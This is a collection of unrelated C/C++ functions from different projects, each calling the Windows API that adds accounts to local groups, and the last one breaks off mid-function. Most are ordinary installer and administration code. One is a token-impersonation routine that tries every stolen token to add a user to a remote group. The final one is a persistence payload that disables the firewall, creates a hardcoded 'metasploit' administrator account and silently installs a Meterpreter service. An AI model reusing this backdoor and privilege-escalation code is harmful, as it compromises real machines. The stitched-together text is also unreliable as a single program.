UINT initializeAfsAdminGroup(void) {
PSID psidAdmin = NULL;
SID_IDENTIFIER_AUTHORITY auth = SECURITY_NT_AUTHORITY;
NET_API_STATUS status;
LOCALGROUP_MEMBERS_INFO_0 *gmAdmins = NULL;
DWORD dwNEntries, dwTEntries;
WCHAR AdminGroupName[UNLEN+1];
DWORD cchName = UNLEN;
if (!LookupAliasFromRid( NULL, DOMAIN_ALIAS_RID_ADMINS, AdminGroupName, &cchName ))
{
/* if we fail, we will try the English string "Administrators" */
wcsncpy(AdminGroupName, L"Administrators", UNLEN+1);
AdminGroupName[UNLEN] = 0;
}
status = NetLocalGroupGetMembers(NULL, AdminGroupName, 0, (LPBYTE *) &gmAdmins, MAX_PREFERRED_LENGTH, &dwNEntries, &dwTEntries, NULL);
if(status)
return status;
status = NetLocalGroupAddMembers(NULL, AFSCLIENT_ADMIN_GROUPNAMEW, 0, (LPBYTE) gmAdmins, dwNEntries);
NetApiBufferFree( gmAdmins );
return status;
}
static BOOL
AddSelectedGroupsToUser(HWND hwndDlg,
PMEMBERSHIP_USER_DATA pUserData)
{
HWND hwndLV;
INT nItem;
TCHAR szGroupName[UNLEN];
BOOL bResult = FALSE;
BOOL bFound;
DWORD i;
LOCALGROUP_MEMBERS_INFO_3 memberInfo;
NET_API_STATUS status;
hwndLV = GetDlgItem(hwndDlg, IDC_USER_ADD_MEMBERSHIP_LIST);
if (ListView_GetSelectedCount(hwndLV) > 0)
{
nItem = ListView_GetNextItem(hwndLV, -1, LVNI_SELECTED);
while (nItem != -1)
{
/* Get the new user name */
ListView_GetItemText(hwndLV,
nItem, 0,
szGroupName,
UNLEN);
bFound = FALSE;
for (i = 0; i < pUserData->dwGroupCount; i++)
{
if (_tcscmp(pUserData->pGroupData[i].lgrui0_name, szGroupName) == 0)
bFound = TRUE;
}
if (!bFound)
{
memberInfo.lgrmi3_domainandname = pUserData->szUserName;
status = NetLocalGroupAddMembers(NULL, szGroupName, 3,
(LPBYTE)&memberInfo, 1);
if (status == NERR_Success)
{
DebugPrintf(_TEXT("Selected group: %s"), szGroupName);
bResult = TRUE;
}
else
{
TCHAR szText[256];
wsprintf(szText, TEXT("Error: %u"), status);
MessageBox(NULL, szText, TEXT("NetLocalGroupAddMembers"), MB_ICONERROR | MB_OK);
}
}
nItem = ListView_GetNextItem(hwndLV, nItem, LVNI_SELECTED);
}
}
return bResult;
}
/**
* Add a member to a local domain group.
*
* @param appContext Application context reference.
* @param aliasNameC Group name.
* @param memberNameC Memeber name.
* @return 0 on success; error code on failure.
*/
DWORD AdtNetLocalGroupAddMember(
IN AppContextTP appContext,
IN PSTR aliasNameC,
IN PSTR memberNameC
)
{
DWORD dwError = ERROR_SUCCESS;
LOCALGROUP_MEMBERS_INFO_3 memberinfo = {0};
PWSTR hostName = NULL;
PWSTR aliasName = NULL;
PWSTR memberName = NULL;
PSTR memberNameN = NULL;
dwError = NormalizeUserName(memberNameC, appContext->workConn->domainName, &memberNameN);
ADT_BAIL_ON_ERROR_NP(dwError);
dwError = LwMbsToWc16s((PCSTR) (appContext->workConn->serverName), &hostName);
ADT_BAIL_ON_ALLOC_FAILURE_NP(!dwError);
dwError = LwMbsToWc16s((PCSTR) aliasNameC, &aliasName);
ADT_BAIL_ON_ALLOC_FAILURE_NP(!dwError);
dwError = LwMbsToWc16s((PCSTR) memberNameN, &memberName);
ADT_BAIL_ON_ALLOC_FAILURE_NP(!dwError);
memberinfo.lgrmi3_domainandname = memberName;
PrintStderr(appContext, LogLevelTrace, "%s: Adding member %s to group %s ...\n",
appContext->actionName, memberNameN, aliasNameC);
/* Perform the delete operation. */
if(!appContext->gopts.isReadOnly) {
dwError = NetLocalGroupAddMembers(hostName, aliasName, 3, &memberinfo, 1);
}
if (dwError) {
dwError += ADT_WIN_ERR_BASE;
ADT_BAIL_ON_ERROR_NP(dwError);
}
PrintStderr(appContext, LogLevelTrace, "%s: Done adding member %s to group %s ...\n",
appContext->actionName, memberNameN, aliasNameC);
cleanup:
LW_SAFE_FREE_MEMORY(hostName);
LW_SAFE_FREE_MEMORY(aliasName);
LW_SAFE_FREE_MEMORY(memberName);
LW_SAFE_FREE_MEMORY(memberNameN);
return dwError;
error:
goto cleanup;
}
bool UserUtilities::AddUserToGroup(CString strUserName, CString strGroupName)
{
LOCALGROUP_MEMBERS_INFO_3 *group = new LOCALGROUP_MEMBERS_INFO_3();
group->lgrmi3_domainandname = strUserName.GetBuffer();
int res = NetLocalGroupAddMembers(NULL, strGroupName, 3, (LPBYTE)group, 1);
if(res == 0)
{
return true;
}
return false;
}
DWORD request_incognito_add_localgroup_user(Remote *remote, Packet *packet)
{
DWORD dwLevel = 1, dwError = 0, num_tokens = 0, i;
NET_API_STATUS nStatus;
LOCALGROUP_MEMBERS_INFO_3 localgroup_member;
SavedToken *token_list = NULL;
HANDLE saved_token;
wchar_t dc_netbios_name_u[BUF_SIZE], username_u[BUF_SIZE], groupname_u[BUF_SIZE];
char *dc_netbios_name, *groupname, *username, return_value[BUF_SIZE] = "", temp[BUF_SIZE] = "";
// Read arguments
Packet *response = packet_create_response(packet);
dc_netbios_name = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_SERVERNAME);
groupname = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_GROUPNAME);
username = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_USERNAME);
mbstowcs(dc_netbios_name_u, dc_netbios_name, strlen(dc_netbios_name)+1);
mbstowcs(username_u, username, strlen(username)+1);
mbstowcs(groupname_u, groupname, strlen(groupname)+1);
localgroup_member.lgrmi3_domainandname = username_u;
// Save current thread token if one is currently being impersonated
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token))
saved_token = INVALID_HANDLE_VALUE;
token_list = get_token_list(&num_tokens);
if (!token_list)
{
sprintf(return_value, "[-] Failed to enumerate tokens with error code: %d\n", GetLastError());
goto cleanup;
}
sprintf(return_value, "[*] Attempting to add user %s to localgroup %s on host %s\n", username, groupname, dc_netbios_name);
// Attempt to add user to localgroup with every token
for (i=0;i<num_tokens;i++)
if (token_list[i].token)
{
// causes major problems (always error 127) once you have impersonated this token once. No idea why!!!
if (!_stricmp("NT AUTHORITY\\ANONYMOUS LOGON", token_list[i].username))
continue;
ImpersonateLoggedOnUser(token_list[i].token);
nStatus = NetLocalGroupAddMembers(dc_netbios_name_u, groupname_u, 3, (LPBYTE)&localgroup_member, 1);
RevertToSelf();
switch (nStatus)
{
case ERROR_ACCESS_DENIED:
case ERROR_LOGON_FAILURE: // unknown username or bad password
case ERROR_INVALID_PASSWORD:
break;
case NERR_Success:
strncat(return_value, "[+] Successfully added user to local group\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case NERR_InvalidComputer:
strncat(return_value, "[-] Computer name invalid\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case ERROR_NO_SUCH_MEMBER:
strncat(return_value, "[-] User not found\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case NERR_GroupNotFound:
case 1376: // found by testing (also group not found)
strncat(return_value, "[-] Local group not found\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
case ERROR_MEMBER_IN_ALIAS:
strncat(return_value, "[-] User already in group\n", sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
default:
sprintf(temp, "Unknown error: %d \n", nStatus);
strncat(return_value, temp, sizeof(return_value)-strlen(return_value)-1);
goto cleanup;
}
}
strncat(return_value, "[-] Access denied with all tokens\n", sizeof(return_value)-strlen(return_value)-1);
cleanup:
for (i=0;i<num_tokens;i++)
CloseHandle(token_list[i].token);
free(token_list);
packet_add_tlv_string(response, TLV_TYPE_INCOGNITO_GENERIC_RESPONSE, return_value);
packet_transmit_response(ERROR_SUCCESS, remote, response);
// Restore token impersonation
if (saved_token != INVALID_HANDLE_VALUE)
ImpersonateLoggedOnUser(saved_token);
return ERROR_SUCCESS;
}
/**
* @brief
* add_to_administrators_group: returns 0 if 'dnamew\unamew' has been added
* to local "Administrators" group; 1 otherwise.
*
* @param[in] dnamew - account name
* @param[in] unamew - A pointer to a constant string that specifies
* the name of the user account for which to set
* information.
*
* @return int
* @retval 0 : 'dnamew\unamew' has been added to local "Administrators" group.
* @retval 1 : 'dnamew\unamew' could not add to local "Administrators" group.
*/
int
add_to_administrators_group(wchar_t *dnamew, wchar_t *unamew)
{
SID *gsid = NULL;
char *gname = NULL; /* special group to add service account to */
wchar_t full_unamew[PBS_MAXHOSTNAME+UNLEN+2]; /* domain\user\0 */
int ret_val = 1;
gsid = create_administrators_sid();
if (gsid && (gname=getgrpname(gsid))) {
LOCALGROUP_MEMBERS_INFO_3 member;
NET_API_STATUS nstatus;
wchar_t gnamew[GNLEN+1];
mbstowcs(gnamew, gname, GNLEN+1);
#if _MSC_VER >= 1400
swprintf(full_unamew, PBS_MAXHOSTNAME+UNLEN+2, L"%s\\%s", dnamew, unamew);
#else
swprintf(full_unamew, L"%s\\%s", dnamew, unamew);
#endif
member.lgrmi3_domainandname = (wchar_t *)full_unamew;
if (for_info_only)
nstatus = NERR_Success;
else
nstatus=NetLocalGroupAddMembers(NULL, gnamew, 3,
(LPBYTE)&member, 1);
if( (nstatus == NERR_Success) || \
(nstatus == ERROR_MEMBER_IN_ALIAS) ) {
printf("%s %S to group \"%S\"\n",
(for_info_only?"Adding":"Added"), full_unamew, gnamew);
ret_val = 0;
} else {
fprintf(stderr,
"Failed to add %S to group \"%S\": error status =%d\n",
full_unamew, gnamew, nstatus);
}
}
if (strlen(winlog_buffer) > 0) { /* any error in getdefgrpname() */
fprintf(stderr, "%s\n", winlog_buffer);
}
if (gsid)
FreeSid(gsid);
else
fprintf(stderr,
"Failed to add %S\\%S to Administrators group: bad SID\n",
dnamew, unamew);
if (gname)
(void)free(gname);
else
fprintf(stderr,
"Failed to get Administrators's actual group name\n");
return (ret_val);
}
int main(int argc, const char **argv)
{
NET_API_STATUS status;
struct libnetapi_ctx *ctx = NULL;
const char *hostname = NULL;
const char *groupname = NULL;
struct LOCALGROUP_MEMBERS_INFO_0 *g0;
struct LOCALGROUP_MEMBERS_INFO_3 *g3;
uint32_t total_entries = 0;
uint8_t *buffer = NULL;
uint32_t level = 3;
const char **names = NULL;
int i = 0;
poptContext pc;
int opt;
struct poptOption long_options[] = {
POPT_AUTOHELP
POPT_COMMON_LIBNETAPI_EXAMPLES
POPT_TABLEEND
};
status = libnetapi_init(&ctx);
if (status != 0) {
return status;
}
pc = poptGetContext("localgroup_addmembers", argc, argv, long_options, 0);
poptSetOtherOptionHelp(pc, "hostname groupname member1 member2 ...");
while((opt = poptGetNextOpt(pc)) != -1) {
}
if (!poptPeekArg(pc)) {
poptPrintHelp(pc, stderr, 0);
goto out;
}
hostname = poptGetArg(pc);
if (!poptPeekArg(pc)) {
poptPrintHelp(pc, stderr, 0);
goto out;
}
groupname = poptGetArg(pc);
if (!poptPeekArg(pc)) {
poptPrintHelp(pc, stderr, 0);
goto out;
}
names = poptGetArgs(pc);
for (i=0; names[i] != NULL; i++) {
total_entries++;
}
switch (level) {
case 0:
status = NetApiBufferAllocate(sizeof(struct LOCALGROUP_MEMBERS_INFO_0) * total_entries,
(void **)&g0);
if (status) {
printf("NetApiBufferAllocate failed with: %s\n",
libnetapi_get_error_string(ctx, status));
goto out;
}
for (i=0; i<total_entries; i++) {
if (!ConvertStringSidToSid(names[i], &g0[i].lgrmi0_sid)) {
printf("could not convert sid\n");
goto out;
}
}
buffer = (uint8_t *)g0;
break;
case 3:
status = NetApiBufferAllocate(sizeof(struct LOCALGROUP_MEMBERS_INFO_3) * total_entries,
(void **)&g3);
if (status) {
printf("NetApiBufferAllocate failed with: %s\n",
libnetapi_get_error_string(ctx, status));
goto out;
}
for (i=0; i<total_entries; i++) {
g3[i].lgrmi3_domainandname = names[i];
}
buffer = (uint8_t *)g3;
break;
default:
break;
}
/* NetLocalGroupAddMembers */
status = NetLocalGroupAddMembers(hostname,
groupname,
level,
buffer,
total_entries);
if (status != 0) {
printf("NetLocalGroupAddMembers failed with: %s\n",
libnetapi_get_error_string(ctx, status));
}
out:
libnetapi_free(ctx);
poptFreeContext(pc);
return status;
}
DWORD create_admin_user(void)
{
NET_API_STATUS rc;
BOOL b;
DWORD dw;
USER_INFO_1 ud;
LOCALGROUP_MEMBERS_INFO_0 gd;
SID_NAME_USE snu;
DWORD cbSid = 256; // 256 bytes should be enough for everybody :)
BYTE Sid[256];
DWORD cbDomain = 256 / sizeof(TCHAR);
TCHAR Domain[256];
OutputDebugString( _T("ADDUSER: in create_admin_user") );
//
// Create user
// http://msdn.microsoft.com/en-us/library/aa370649%28v=VS.85%29.aspx
//
memset(&ud, 0, sizeof(ud));
ud.usri1_name = _T("audit"); // username
ud.usri1_password = _T("Test123456789!"); // password
ud.usri1_priv = USER_PRIV_USER; // cannot set USER_PRIV_ADMIN on creation
ud.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT; // must be set
ud.usri1_script_path = NULL;
rc = NetUserAdd(
NULL, // local server
1, // information level
(LPBYTE)&ud,
NULL // error value
);
if (rc != NERR_Success) {
_tprintf(_T("NetUserAdd FAIL %d 0x%08x\r\n"), rc, rc);
return rc;
}
//
// Get user SID
// http://msdn.microsoft.com/en-us/library/aa379159(v=vs.85).aspx
//
b = LookupAccountName(
NULL, // local server
_T("audit"), // account name
Sid, // SID
&cbSid, // SID size
Domain, // Domain
&cbDomain, // Domain size
&snu // SID_NAME_USE (enum)
);
if (!b) {
dw = GetLastError();
_tprintf(_T("LookupAccountName FAIL %d 0x%08x\r\n"), dw, dw);
return dw;
}
//
// Add user to "Administrators" local group
// http://msdn.microsoft.com/en-us/library/aa370436%28v=VS.85%29.aspx
//
memset(&gd, 0, sizeof(gd));
gd.lgrmi0_sid = (PSID)Sid;
rc = NetLocalGroupAddMembers(
NULL, // local server
_T("Administrators"),
0, // information level
(LPBYTE)&gd,
1 // only one entry
);
if (rc != NERR_Success) {
_tprintf(_T("NetLocalGroupAddMembers FAIL %d 0x%08x\r\n"), rc, rc);
return rc;
}
OutputDebugString( _T("ADDUSER: admin user created successfully!") );
return 0;
}
/////////////////////////////////////////////////////////////////////
//
// Function:
//
// Description:
//
/////////////////////////////////////////////////////////////////////
UINT CACreateBOINCGroups::OnExecution()
{
NET_API_STATUS nasReturnValue;
DWORD dwParameterError;
UINT uiReturnValue = -1;
BOOL bBOINCAdminsCreated = FALSE;
BOOL bBOINCUsersCreated = FALSE;
BOOL bBOINCProjectsCreated = FALSE;
tstring strUserSID;
tstring strUsersGroupName;
tstring strBOINCMasterAccountUsername;
tstring strBOINCProjectAccountUsername;
tstring strEnableProtectedApplicationExecution;
PSID pAdminSID = NULL;
PSID pInstallingUserSID = NULL;
PSID pBOINCMasterSID = NULL;
PSID pBOINCProjectSID = NULL;
SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;
uiReturnValue = GetProperty( _T("UserSID"), strUserSID );
if ( uiReturnValue ) return uiReturnValue;
uiReturnValue = GetProperty( _T("GROUPALIAS_USERS"), strUsersGroupName );
if ( uiReturnValue ) return uiReturnValue;
uiReturnValue = GetProperty( _T("BOINC_MASTER_USERNAME"), strBOINCMasterAccountUsername );
if ( uiReturnValue ) return uiReturnValue;
uiReturnValue = GetProperty( _T("BOINC_PROJECT_USERNAME"), strBOINCProjectAccountUsername );
if ( uiReturnValue ) return uiReturnValue;
uiReturnValue = GetProperty( _T("ENABLEPROTECTEDAPPLICATIONEXECUTION2"), strEnableProtectedApplicationExecution );
if ( uiReturnValue ) return uiReturnValue;
// Create a SID for the BUILTIN\Administrators group.
if(!AllocateAndInitializeSid(
&SIDAuthNT, 2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&pAdminSID))
{
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
GetLastError(),
_T("AllocateAndInitializeSid Error for BUILTIN\\Administrators")
);
return ERROR_INSTALL_FAILURE;
}
// Create a SID for the current logged in user.
if(!ConvertStringSidToSid(strUserSID.c_str(), &pInstallingUserSID))
{
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
GetLastError(),
_T("ConvertStringSidToSid Error for installing user")
);
return ERROR_INSTALL_FAILURE;
}
// Create a SID for the 'boinc_master' user account.
if (_T("1") == strEnableProtectedApplicationExecution) {
if(!GetAccountSid(NULL, strBOINCMasterAccountUsername.c_str(), &pBOINCMasterSID))
{
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
GetLastError(),
_T("GetAccountSid Error for 'boinc_master' user account")
);
return ERROR_INSTALL_FAILURE;
}
}
// Create a SID for the 'boinc_project' user account.
if (_T("1") == strEnableProtectedApplicationExecution) {
if(!GetAccountSid(NULL, strBOINCProjectAccountUsername.c_str(), &pBOINCProjectSID))
{
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
GetLastError(),
_T("GetAccountSid Error for 'boinc_master' user account")
);
return ERROR_INSTALL_FAILURE;
}
}
// Create the 'boinc_admins' group if needed
//
LOCALGROUP_INFO_1 lgrpiAdmins;
lgrpiAdmins.lgrpi1_name = _T("boinc_admins");
lgrpiAdmins.lgrpi1_comment = _T("Accounts in this group can control the BOINC client.");
nasReturnValue = NetLocalGroupAdd(
NULL,
1,
(LPBYTE)&lgrpiAdmins,
&dwParameterError
);
if ((NERR_Success != nasReturnValue) && (ERROR_ALIAS_EXISTS != nasReturnValue)) {
LogMessage(
INSTALLMESSAGE_INFO,
NULL,
NULL,
NULL,
nasReturnValue,
_T("NetLocalGroupAdd retval")
);
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
nasReturnValue,
_T("Failed to create the 'boinc_admins' group.")
);
return ERROR_INSTALL_FAILURE;
}
if (NERR_Success == nasReturnValue) {
bBOINCAdminsCreated = TRUE;
}
// If we just created the 'boinc_admins' local group then we need to populate
// it with the default accounts.
LOCALGROUP_MEMBERS_INFO_0 lgrmiAdmins;
lgrmiAdmins.lgrmi0_sid = pAdminSID;
nasReturnValue = NetLocalGroupAddMembers(
NULL,
_T("boinc_admins"),
0,
(LPBYTE)&lgrmiAdmins,
1
);
if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
LogMessage(
INSTALLMESSAGE_INFO,
NULL,
NULL,
NULL,
nasReturnValue,
_T("NetLocalGroupAddMembers retval")
);
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
nasReturnValue,
_T("Failed to add user to the 'boinc_admins' group (Administrator).")
);
return ERROR_INSTALL_FAILURE;
}
lgrmiAdmins.lgrmi0_sid = pInstallingUserSID;
nasReturnValue = NetLocalGroupAddMembers(
NULL,
_T("boinc_admins"),
0,
(LPBYTE)&lgrmiAdmins,
1
);
if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
LogMessage(
INSTALLMESSAGE_INFO,
NULL,
NULL,
NULL,
nasReturnValue,
_T("NetLocalGroupAddMembers retval")
);
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
nasReturnValue,
_T("Failed to add user to the 'boinc_admins' group (Installing User).")
);
return ERROR_INSTALL_FAILURE;
}
if (_T("1") == strEnableProtectedApplicationExecution) {
lgrmiAdmins.lgrmi0_sid = pBOINCMasterSID;
nasReturnValue = NetLocalGroupAddMembers(
NULL,
_T("boinc_admins"),
0,
(LPBYTE)&lgrmiAdmins,
1
);
if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
LogMessage(
INSTALLMESSAGE_INFO,
NULL,
NULL,
NULL,
nasReturnValue,
_T("NetLocalGroupAddMembers retval")
);
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
nasReturnValue,
_T("Failed to add user to the 'boinc_admins' group (BOINC Master).")
);
return ERROR_INSTALL_FAILURE;
}
}
// Create the 'boinc_users' group if needed
//
LOCALGROUP_INFO_1 lgrpiUsers;
lgrpiUsers.lgrpi1_name = _T("boinc_users");
lgrpiUsers.lgrpi1_comment = _T("Accounts in this group can monitor the BOINC client.");
nasReturnValue = NetLocalGroupAdd(
NULL,
1,
(LPBYTE)&lgrpiUsers,
&dwParameterError
);
if ((NERR_Success != nasReturnValue) && (ERROR_ALIAS_EXISTS != nasReturnValue)) {
LogMessage(
INSTALLMESSAGE_INFO,
NULL,
NULL,
NULL,
nasReturnValue,
_T("NetLocalGroupAdd retval")
);
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
nasReturnValue,
_T("Failed to create the 'boinc_users' group.")
);
return ERROR_INSTALL_FAILURE;
}
if (NERR_Success == nasReturnValue) {
bBOINCUsersCreated = TRUE;
}
// Create the 'boinc_project' group if needed
//
LOCALGROUP_INFO_1 lgrpiProjects;
lgrpiProjects.lgrpi1_name = _T("boinc_projects");
lgrpiProjects.lgrpi1_comment = _T("Accounts in this group are used to execute boinc applications.");
nasReturnValue = NetLocalGroupAdd(
NULL,
1,
(LPBYTE)&lgrpiProjects,
&dwParameterError
);
if ((NERR_Success != nasReturnValue) && (ERROR_ALIAS_EXISTS != nasReturnValue)) {
LogMessage(
INSTALLMESSAGE_INFO,
NULL,
NULL,
NULL,
nasReturnValue,
_T("NetLocalGroupAdd retval")
);
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
nasReturnValue,
_T("Failed to create the 'boinc_projects' group.")
);
return ERROR_INSTALL_FAILURE;
}
if (NERR_Success == nasReturnValue) {
bBOINCProjectsCreated = TRUE;
}
// If the user has enabled protected application execution then we need to add the 'boinc_project'
// account to the local group and the 'Users' local group. As an aside 'boinc_master' is also added
// to the 'Users' group.
if (_T("1") == strEnableProtectedApplicationExecution) {
LOCALGROUP_MEMBERS_INFO_0 lgrmiMembers;
lgrmiMembers.lgrmi0_sid = pBOINCProjectSID;
nasReturnValue = NetLocalGroupAddMembers(
NULL,
_T("boinc_projects"),
0,
(LPBYTE)&lgrmiMembers,
1
);
if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
LogMessage(
INSTALLMESSAGE_INFO,
NULL,
NULL,
NULL,
nasReturnValue,
_T("NetLocalGroupAddMembers retval")
);
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
nasReturnValue,
_T("Failed to add user to the 'boinc_projects' group (boinc_project).")
);
return ERROR_INSTALL_FAILURE;
}
nasReturnValue = NetLocalGroupAddMembers(
NULL,
strUsersGroupName.c_str(),
0,
(LPBYTE)&lgrmiMembers,
1
);
if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
LogMessage(
INSTALLMESSAGE_INFO,
NULL,
NULL,
NULL,
nasReturnValue,
_T("NetLocalGroupAddMembers retval")
);
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
nasReturnValue,
_T("Failed to add user to the 'Users' group (boinc_project).")
);
return ERROR_INSTALL_FAILURE;
}
lgrmiMembers.lgrmi0_sid = pBOINCMasterSID;
nasReturnValue = NetLocalGroupAddMembers(
NULL,
strUsersGroupName.c_str(),
0,
(LPBYTE)&lgrmiMembers,
1
);
if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
LogMessage(
INSTALLMESSAGE_INFO,
NULL,
NULL,
NULL,
nasReturnValue,
_T("NetLocalGroupAddMembers retval")
);
LogMessage(
INSTALLMESSAGE_ERROR,
NULL,
NULL,
NULL,
nasReturnValue,
_T("Failed to add user to the 'Users' group (boinc_master).")
);
return ERROR_INSTALL_FAILURE;
}
}
SetProperty( _T("BOINC_ADMINS_GROUPNAME"), _T("boinc_admins") );
SetProperty( _T("BOINC_USERS_GROUPNAME"), _T("boinc_users") );
SetProperty( _T("BOINC_PROJECTS_GROUPNAME"), _T("boinc_projects") );
if (bBOINCAdminsCreated || bBOINCUsersCreated || bBOINCProjectsCreated) {
RebootWhenFinished();
}
if(pAdminSID != NULL) FreeSid(pAdminSID);
if(pInstallingUserSID != NULL) FreeSid(pInstallingUserSID);
if(pBOINCMasterSID != NULL) FreeSid(pBOINCMasterSID);
if(pBOINCProjectSID != NULL) FreeSid(pBOINCProjectSID);
return ERROR_SUCCESS;
}
JSBool netlocalgroupaddmembers(JSContext * cx, JSObject * obj, uintN argc, jsval * argv, jsval * rval)
{
JS_BeginRequest(cx);
if(argc < 2)
{
JS_ReportError(cx, "Must pass members to be added.");
JS_EndRequest(cx);
return JS_FALSE;
}
LOCALGROUP_MEMBERS_INFO_0 * members;
DWORD * lookupResult;
DWORD memberCount = 0;
JSString * groupName = JS_ValueToString(cx, argv[0]);
argv[0] = STRING_TO_JSVAL(groupName);
if(JSVAL_IS_OBJECT(argv[1]) && JS_IsArrayObject(cx, JSVAL_TO_OBJECT(argv[1])))
{
JSObject * memberArray;
JS_ValueToObject(cx, argv[1], &memberArray);
argv[1] = OBJECT_TO_JSVAL(memberArray);
JS_GetArrayLength(cx, memberArray, (jsuint*)&memberCount);
members = (LOCALGROUP_MEMBERS_INFO_0*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(LOCALGROUP_MEMBERS_INFO_0) * memberCount);
lookupResult = (DWORD*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(DWORD) * memberCount);
JS_EnterLocalRootScope(cx);
for(DWORD i = 0; i < memberCount; i++)
{
jsval curMemberVal;
JSString * curMemberString;
JS_GetElement(cx, memberArray, (jsint)i, &curMemberVal);
curMemberString = JS_ValueToString(cx, curMemberVal);
members[i].lgrmi0_sid = convert_jsstring_to_sid(cx, curMemberString, &lookupResult[i]);
}
JS_LeaveLocalRootScope(cx);
}
else
{
JSString * memberString = JS_ValueToString(cx, argv[1]);
argv[1] = STRING_TO_JSVAL(memberString);
members = (LOCALGROUP_MEMBERS_INFO_0*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(LOCALGROUP_MEMBERS_INFO_0));
lookupResult = (DWORD*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(DWORD));
members->lgrmi0_sid = convert_jsstring_to_sid(cx, memberString, lookupResult);
memberCount = 1;
}
for(DWORD i = 0; i < memberCount; i++)
{
if(lookupResult[i] == 0)
{
JS_YieldRequest(cx);
lookupResult[i] = NetLocalGroupAddMembers(NULL, (LPWSTR)JS_GetStringChars(groupName), 0, (LPBYTE)&members[i], 1);
}
}
JSObject * retArray = JS_NewArrayObject(cx, 0, NULL);
*rval = OBJECT_TO_JSVAL(retArray);
for(DWORD i = 0; i < memberCount; i++)
{
jsval curResultVal;
JS_NewNumberValue(cx, lookupResult[i], &curResultVal);
JS_DefineElement(cx, retArray, i, curResultVal, NULL, NULL, 0);
HeapFree(GetProcessHeap(), 0, members[i].lgrmi0_sid);
}
HeapFree(GetProcessHeap(), 0, members);
HeapFree(GetProcessHeap(), 0, lookupResult);
JS_EndRequest(cx);
return JS_TRUE;
}
void start(){
//fix wow32-64 fsredir
PVOID OldValue;
Wow64DisableWow64FsRedirectionFunc disableWow = (Wow64DisableWow64FsRedirectionFunc)GetProcAddress(
GetModuleHandleA("kernel32"),"Wow64DisableWow64FsRedirection");
if( disableWow )
disableWow(&OldValue);
char windowsPath[MAX_PATH];
GetWindowsDirectoryA(windowsPath,MAX_PATH);
SetCurrentDirectoryA(windowsPath);
//turn off fw
HKEY mkey;
DWORD four = 4;
RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\MpsSvc",
0,KEY_SET_VALUE|KEY_WOW64_64KEY,&mkey);
RegSetValueExA(mkey,"Start",0,REG_DWORD,(PBYTE)&four,sizeof(DWORD));
RegCloseKey(mkey);
//add user
USER_INFO_1 userinfo;
userinfo.usri1_name = L"metasploit";
userinfo.usri1_password = L"p@SSw0rd!123456";
userinfo.usri1_priv = USER_PRIV_USER;
userinfo.usri1_home_dir = NULL;
userinfo.usri1_comment = L"";
userinfo.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD;
userinfo.usri1_script_path = NULL;
DWORD res = NetUserAdd(NULL,1,(PBYTE)&userinfo,NULL);
if(res == NERR_Success){
LOCALGROUP_MEMBERS_INFO_3 lgmi3;
lgmi3.lgrmi3_domainandname = userinfo.usri1_name;
NetLocalGroupAddMembers(NULL,L"Administrators",3,(PBYTE)&lgmi3,1);
}
//start metsvc
STARTUPINFOA strt;
PROCESS_INFORMATION proci;
for(int i = 0; i < sizeof(strt); i++)
((char*)&strt)[i]=0;
for(int i = 0; i < sizeof(proci); i++)
((char*)&proci)[i]=0;
if( disableWow )//if 64 bit
CreateProcessA("SysWOW64\\metsvc.exe","metsvc.exe install-service",NULL,
NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci);
else
CreateProcessA("System32\\metsvc.exe","metsvc.exe install-service",NULL,
NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci);
//permissions, owner?
DWORD sidSize = SECURITY_MAX_SID_SIZE;
PSID ownersid = LocalAlloc(LMEM_FIXED,sidSize);
CreateWellKnownSid(WinLocalSystemSid, NULL, ownersid, &sidSize);
SetNamedSecurityInfoA("System32\\spoolsv.exe",SE_FILE_OBJECT,OWNER_SECURITY_INFORMATION,ownersid,NULL,NULL,NULL);
